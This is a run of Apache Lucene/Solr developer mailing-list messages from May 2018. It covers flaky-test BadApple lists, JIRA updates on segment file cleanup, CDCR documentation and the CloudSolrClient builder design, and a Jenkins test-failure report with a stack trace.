>>> org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>>> org.apache.solr.cloud.RestartWhileUpdatingTest.test
>>> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>>> org.apache.solr.cloud.TestPullReplica.testCreateDelete
>>> org.apache.solr.cloud.TestPullReplica.testKillLeader
>>> org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>>> org.apache.solr.cloud.UnloadDistributedZkTest.test
>>> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>>> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>>> org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>>> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>>> org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>>> org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>>> org.apache.solr.cloud.hdfs.StressHdfsTest.test
>>> org.apache.solr.handler.TestSQLHandler.doTest
>>> org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>>> org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>>> org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>>> org.apache.solr.update.TestInPlaceUpdatesDistrib.test
>>> 
>>> 
>>> Number of AwaitsFix: 21 Number of BadApples: 99
>>> 
>>> *AwaitsFix Annotations:
>>> 
>>> 
>>> Lucene AwaitsFix
>>> GeoPolygonTest.java
>>> testLUCENE8276_case3()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)
>>> 
>>> GeoPolygonTest.java
>>> testLUCENE8280()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)
>>> 
>>> GeoPolygonTest.java
>>> testLUCENE8281()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> RandomGeoPolygonTest.java
>>> testCompareBigPolygons()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> RandomGeoPolygonTest.java
>>> testCompareSmallPolygons()
>>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>> 
>>> TestControlledRealTimeReopenThread.java
>>> testCRTReopen()
>>> @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-

[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482885#comment-16482885
 ] 

ASF subversion and git services commented on LUCENE-8324:
-

Commit 2ce53791d3205efff5eb12d0d24911b3ea31abe3 in lucene-solr's branch 
refs/heads/master from [~simonw]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=2ce5379 ]

LUCENE-8324: Checkpoint after fully deletes segment is dropped on flush


> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Simon Willnauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Simon Willnauer resolved LUCENE-8324.
-
Resolution: Fixed

thanks [~dnhatn]

> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482874#comment-16482874
 ] 

ASF subversion and git services commented on LUCENE-8324:
-

Commit cc2ee2305001a49536886653d2133ee1a3b51b82 in lucene-solr's branch 
refs/heads/branch_7x from [~simonw]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=cc2ee23 ]

LUCENE-8324: Checkpoint after fully deletes segment is dropped on flush


> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-12223) Document 'Initial Startup' for bidirectional approach in CDCR

2018-05-21 Thread Cassandra Targett (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482867#comment-16482867
 ] 

Cassandra Targett edited comment on SOLR-12223 at 5/21/18 6:29 PM:
---

[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target
data centers on first time startup as an alternative to the following 
procedure. 
For very large indexes, time should be allocated for the initial 
synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional or bi-directional? Or just uni-directional? It's placement 
suggests it applies to both types.


was (Author: ctargett):
[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target data centers on first time startup as an 
alternative to the following procedure. For very large indexes, time should be 
allocated for the initial synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional or bi-directional? Or just uni-directional? It's placement 
suggests it applies to both types.

> Document 'Initial Startup' for bidirectional approach in CDCR
> -
>
> Key: SOLR-12223
> URL: https://issues.apache.org/jira/browse/SOLR-12223
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: CDCR, documentation
>Affects Versions: 7.3
>Reporter: Amrit Sarkar
>Assignee: Cassandra Targett
>Priority: Minor
> Fix For: 7.4
>
> Attachments: SOLR-12223.patch
>
>
> Add {{Initial Startup}} for bidirectional approach to {{cdcr-config.html}}.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12223) Document 'Initial Startup' for bidirectional approach in CDCR

2018-05-21 Thread Cassandra Targett (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482867#comment-16482867
 ] 

Cassandra Targett commented on SOLR-12223:
--

[~sarkaramr...@gmail.com], I'm taking a look at this (belatedly, sorry), and 
noticed that you left this note in place:

{noformat}
CDCR Bootstrapping
Solr 6.2 added the functionality to allow CDCR to replicate the entire index 
from the Source to the Target data centers on first time startup as an 
alternative to the following procedure. For very large indexes, time should be 
allocated for the initial synchronization if this option is chosen.
{noformat}

I wanted to remove the "Solr 6.2 added..." part of that sentence (not a 
historical document, don't need to explain when stuff was added especially when 
it was years ago), but realized that the rest of it mentions bootstrapping as 
an alternative to the info to follow but without a link to an explanation of 
what to do if you choose that alternative (IOW, the word "bootstrap" only 
occurs once on this page in that place). Also, is that paragraph applicable to 
both uni-directional or bi-directional? Or just uni-directional? It's placement 
suggests it applies to both types.

> Document 'Initial Startup' for bidirectional approach in CDCR
> -
>
> Key: SOLR-12223
> URL: https://issues.apache.org/jira/browse/SOLR-12223
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: CDCR, documentation
>Affects Versions: 7.3
>Reporter: Amrit Sarkar
>Assignee: Cassandra Targett
>Priority: Minor
> Fix For: 7.4
>
> Attachments: SOLR-12223.patch
>
>
> Add {{Initial Startup}} for bidirectional approach to {{cdcr-config.html}}.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: BadApple candidates

2018-05-21 Thread Erick Erickson
Alan:

http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/

You can get there from Hoss's rollup reports here:
http://fucit.org/solr-jenkins-reports/failure-report.html

To be included in any potential BadApple, two things must be true:
1> it must have failed since last Monday
2> it must have failed in the report collected two weeks ago Monday

Erick


On Mon, May 21, 2018 at 12:40 PM, Alan Woodward  wrote:
> When did TestLRUQueryCache fail?  I haven’t seen that one.
>
>> On 21 May 2018, at 16:00, Erick Erickson  wrote:
>>
>> I'm going to change how I collect the badapple candidates. After
>> getting a little
>> overwhelmed by the number of failure e-mails (even ignoring the ones with
>> BadApple enabled), "It come to me in a vision! In a flash!"" (points if you
>> know where that comes from, hint: Old music involving a pickle).
>>
>> Since I collect failures for a week then run filter them by what's
>> also in Hoss's
>> results from two  weeks ago, that's really equivalent to creating the 
>> candidate
>> list from the intersection of the most recent week of Hoss's results and the
>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
>>
>> So that's what I'll do going forward.
>>
>> Meanwhile, here's the list for this Thursday.
>>
>> BadApple candidates: I'll BadApple these on Thursday unless there are 
>> objections
>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>>  org.apache.solr.TestDistributedSearch.test
>>  org.apache.solr.cloud.AddReplicaTest.test
>>  org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>>  org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>>  
>> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>>  org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>>  org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>>  
>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
>>  org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>>  org.apache.solr.cloud.RestartWhileUpdatingTest.test
>>  
>> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>>  org.apache.solr.cloud.TestPullReplica.testCreateDelete
>>  org.apache.solr.cloud.TestPullReplica.testKillLeader
>>  org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>>  org.apache.solr.cloud.UnloadDistributedZkTest.test
>>  
>> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>>  
>> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>>  org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>>  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>>  
>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>>  
>> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>>  org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>>  org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>>  org.apache.solr.cloud.hdfs.StressHdfsTest.test
>>  org.apache.solr.handler.TestSQLHandler.doTest
>>  org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>>  org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>>  org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>>  org.apache.solr.update.TestInPlaceUpdatesDistrib.test
>>
>>
>> Number of AwaitsFix: 21 Number of BadApples: 99
>>
>> *AwaitsFix Annotations:
>>
>>
>> Lucene AwaitsFix
>> GeoPolygonTest.java
>>  testLUCENE8276_case3()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)
>>
>> GeoPolygonTest.java
>>  testLUCENE8280()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)
>>
>> GeoPolygonTest.java
>>  testLUCENE8281()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> RandomGeoPolygonTest.java
>>  testCompareBigPolygons()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> RandomGeoPolygonTest.java
>>  testCompareSmallPolygons()
>>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
>>
>> TestControlledRealTimeReopenThread.java
>>  testCRTReopen()
>>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737";)
>>
>> TestICUNormalizer2CharFilter.java
>>  testRandomStrings()
>>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595";)
>>
>> TestICUTokenizerCJK.j

[jira] [Comment Edited] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey edited comment on SOLR-12309 at 5/21/18 6:02 PM:
--

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with one builder() 
method that includes all required arguments.



was (Author: elyograg):
This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.


> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey edited comment on SOLR-12309 at 5/21/18 5:55 PM:
--

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods, as the only non-deprecated ways of obtaining a Builder 
object:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.



was (Author: elyograg):
This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.


> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482814#comment-16482814
 ] 

Shawn Heisey commented on SOLR-12309:
-

This issue started out as confusion over how Optional worked, and desiring 
better javadoc.  And maybe that's where it should stay.  Design shifts can 
happen in another issue.

On the design:  I think the mix of constructors and fluent methods confuses the 
situation and gives an impression that we're undecided about whether we want 
fluent or not.

Here's another idea, sort of a meld of both approaches, abandoning the use of 
constructors, and a lot less complicated than what I last proposed.  Implement 
these static methods:

CloudSolrClient.builder(Collection zkHosts, String chroot)
CloudSolrClient.builder(Collection solrUrls)

If there's no chroot, that argument can be null, which most Java developers 
understand fully.  There may still be situations where using certain fluent 
methods might throw Illegal* exceptions, but there wouldn't be very many 
situations like that.

I think the other SolrClient implementations can get by with a single no-arg 
builder() method.


> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-7.x-Solaris (64bit/jdk1.8.0) - Build # 638 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Solaris/638/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseParallelGC

14 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
number of ops expected:<2> but was:<1>

Stack Trace:
java.lang.AssertionError: number of ops expected:<2> but was:<1>
at 
__randomizedtesting.SeedInfo.seed([2D91BFF4BEC51F5D:4E5A8976270A6C70]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.failNotEquals(Assert.java:647)
at org.junit.Assert.assertEquals(Assert.java:128)
at org.junit.Assert.assertEquals(Assert.java:472)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:187)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
